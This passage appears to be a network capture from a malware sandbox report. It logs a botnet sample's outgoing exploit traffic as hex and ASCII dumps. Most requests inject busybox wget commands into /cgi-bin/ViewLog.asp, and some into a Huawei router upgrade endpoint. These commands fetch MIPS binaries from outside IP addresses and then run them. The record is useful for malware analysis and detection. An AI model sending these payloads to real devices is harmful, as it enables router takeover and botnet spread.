                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:14.118447065 CET401INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 04:18:12 GMT
                                              Server: Boa/0.94.14rc21
                                              Accept-Ranges: bytes
                                              Connection: close
                                              Content-Type: text/html; charset=ISO-8859-1
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              711192.168.2.143301862.29.74.2228080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:13.895700932 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              712192.168.2.144048494.110.23.2398080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:14.104641914 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              713192.168.2.143547885.70.45.148080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:14.210397005 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              714192.168.2.144305894.187.99.988080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:14.235584974 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              715192.168.2.145134062.171.155.1688080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:14.406213999 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:15.010040998 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:15.210489988 CET1024INHTTP/1.1 404
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 774
                                              Date: Thu, 23 Nov 2023 04:18:15 GMT
                                              Keep-Alive: timeout=20
                                              Connection: keep-alive
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 5b 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 5d 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 38 32 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [&#47;cgi-bin&#47;ViewLog.asp] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.82</h3></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              716192.168.2.145628494.110.116.2148080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:14.976747990 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              717192.168.2.144326094.122.97.2418080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:15.009900093 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              718192.168.2.1459218156.241.101.14137215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:15.036113024 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:19.264812946 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              719192.168.2.143779494.131.10.568080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:15.190299034 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:15.376699924 CET113INHTTP/1.1 400 Bad Request
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              720192.168.2.144071262.29.91.518080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:15.236378908 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              721192.168.2.145559895.86.81.628080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:15.418817043 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              722192.168.2.145349431.136.86.2198080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:15.863264084 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:16.416918993 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:17.536884069 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:19.776798010 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
